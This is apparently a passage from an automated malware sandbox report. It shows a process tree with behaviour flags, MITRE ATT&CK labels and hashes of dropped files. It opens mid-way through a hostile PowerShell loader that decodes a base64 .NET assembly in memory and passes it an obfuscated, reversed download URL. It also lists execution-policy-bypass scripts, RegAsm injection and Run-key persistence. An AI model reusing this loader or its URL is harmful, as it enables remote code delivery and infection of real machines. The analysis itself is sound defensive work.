$RXiVj_YltHK = [System.Convert]::FromBase64String( $MWfua.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $RXiVj_YltHK ).GetType( 'ClassLibrary3.Class1' ).GetMethod( 'prFVI' ).Invoke($null, [object[]] ( '22%9703cf44bd35a5c47462b7be829812f622%=v&daolnwod=ecruos&txt.4202.70.0372%72%8-FTUD3%A2%emanelif+B3%22%txt.4202.70.0322%D3%emanelif+B3%tnemhcatta=noitisopsid-tnetnoc-esnopser?txt.e45342427985-5e79-fc64-4548-097fa055/oQO2Lu0o/smeti/moc.thgiz.ndc.0n.1rt.7p//:sptth' , 'C:\Users\Admin\AppData\Local\Temp\test.js', 'True1' ) );};"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4808 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft SyS\\x2.ps1"5⤵
- Adds Run key to start application
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2688 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\LocalLow\Daft SyS\isltf.ps1"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4076 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
- System Location Discovery: System Language Discovery
PID:4360 -
C:\Windows\system32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\test.js"5⤵PID:2448
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
132KB
MD5c48ca9208d2d72f7c4aadc4552c4371c
SHA1009a66081262d0e7ac6d9654f4d19ffe8f7b9965
SHA256488da21024f08719000d1c44b00bf74fa4343eb1cccffb786efac08cba079fd5
SHA512404b0062421b807cace5d4ab37b8379373045fe57bb3a020b98484b56adc1096c929319194f190edba247959a8dce7c6097b393d6a811e75941ff586e9ac71e0
-
Filesize
313B
MD5b141032fc27557e652dbaf28bdd48dcf
SHA1733fa3581410a4d450b8dcfacf16ab74352b4453
SHA2566521823e3cc8a09664fd1db0c845d53a43d3253d69687b7c307d5e817d34ec0c
SHA512b948bd78a7354aa4dc01eaf3e06ba72727b9ffbe462e405b5e7c788acd985a980bf7ef0ff5ea29b5e7e2834ffde88a4c19e12df0281239189dd16de5247f2b10
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD5641727f6e43739ea45e79725fc622ae3
SHA1c9eb462c5739e508a25b99d603ae7dba3946a1f6
SHA256465fe52cdaadf696aac89d86337c39b60cbb0f3c98a8c1a12b0bfe8443bca80d
SHA512b221135371df74d36994b47c0788a32d06b0ce5522127902f7cae083e4f6563736f56f0bb06113e452acf87e6a756f44fea522b5f0db75be1203c6a24bfada6a
-
Filesize
64B
MD5d255504cb22d7dce432c9ef4188f05a5
SHA1c0b1ce40c879d98fd32bde7d397f26d38996427a
SHA256c4870d8fb8553880c55e15cd646dda458c7299f0a9ad487a81941a1dbcf9de84
SHA512d13c8e33dd42bb49f076e3a932bc634577ee9462ad9aa2ba26cc67243794b28342c6db59df5d07bc15c70f2cc0e36e29a8c564e6842bead382a1c9b46b0a7846
-
Filesize
1KB
MD56c4805e00673bef922d51b1a7137028f
SHA10eabb38482d1733dd85a2af9c5342c2cafcd41eb
SHA2567af7d25fe7e3bb8b75bcffaa8573e2e9af7e7f70a840fa8bc0196d0ab396ecdd
SHA512eb6dacb4e0da6f45028ebf65ebffdc6aecdb6a34a582bb69aa5836ef02a7115f6b500ef2dd6a2c2be994ec9d0cbbff564368724593666105d3d4475441830cc1
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
12KB
MD54e37cf7563ad5ebcde8bfcb51a515c48
SHA1b9f758dd64b60da7da2f01b680d45abaf854f41e
SHA256f198a3e52894fe22bdb0b4e42347a624157b60f501ea48816bb75911c3e38331
SHA5129f63413b1759b8c467a7aa146a12f709ce5a929a928f70ea00799b6246eab3d04afea884d78a87e23ab4cb5fcb8b51269d2a5221b0bb93f9cca7c3468d2359fe
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
Filesize1KB
MD5de36db977ed6368d6c2c772d2150d1eb
SHA1b6cd0ca1d70097fe2b4a0ceff30d0626f3a64e29
SHA256bd1e89e16a174c41aa3f8152602a79a5edc067587175bd6e93c1a916604a03a2
SHA512fb8b623164930ed143ca51cf79283765a919f7b23475825465f3291f0914d552d97024c93dfdd2b3113e079d083807e6e1ac0f6d90d2264f376da7d69781c7a9